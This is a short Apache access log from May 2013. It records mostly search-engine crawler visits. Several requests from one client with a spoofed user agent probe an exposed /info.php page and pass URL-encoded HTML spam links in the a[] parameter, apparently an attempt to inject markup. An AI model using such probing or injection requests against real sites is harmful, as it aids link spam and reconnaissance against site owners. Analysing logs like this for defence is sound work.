77.88.42.27 - - [06/May/2013:11:24:35 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [06/May/2013:13:28:57 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [06/May/2013:13:28:59 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [06/May/2013:13:28:59 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [06/May/2013:13:29:03 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [06/May/2013:13:29:05 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
78.8.68.246 - - [06/May/2013:15:07:16 +0200] "GET /info.php HTTP/1.1" 200 50590 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.8.68.246 - - [06/May/2013:15:07:16 +0200] "GET /info.php?a[]=%3Ca+href=http://7400.jawamdam.com.pl%3Ew$p1erajmy+hosp1cja%3C/a%3E HTTP/1.1" 200 51364 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.8.68.246 - - [06/May/2013:15:07:17 +0200] "GET /info.php?a[]=%3Ca+href=http://7400.jawamdam.com.pl%3Ew$p1erajmy+hosp1cja%3C/a%3E HTTP/1.1" 200 50751 "http://activparty.hu/" "-"
178.63.16.210 - - [06/May/2013:15:07:23 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.10 (build 01952); GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.8.68.246 - - [06/May/2013:15:07:23 +0200] "GET /info.php?a[]=%3Ca+href=http://7400.jawamdam.com.pl%3Ew$p1erajmy+hosp1cja%3C/a%3E.radabg.com/url/activparty.hu HTTP/1.1" 200 51389 "http://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
110.75.174.39 - - [06/May/2013:15:17:02 +0200] "GET / HTTP/1.1" 200 3021 "-" "YisouSpider"
203.171.233.91 - - [06/May/2013:19:09:47 +0200] "GET / HTTP/1.0" 200 3021 "-" "-"
203.171.233.91 - - [06/May/2013:19:09:48 +0200] "GET / HTTP/1.0" 200 3021 "-" "-"
220.181.108.91 - - [06/May/2013:19:12:41 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.67.210 - - [06/May/2013:21:12:50 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
123.125.71.84 - - [06/May/2013:21:51:25 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
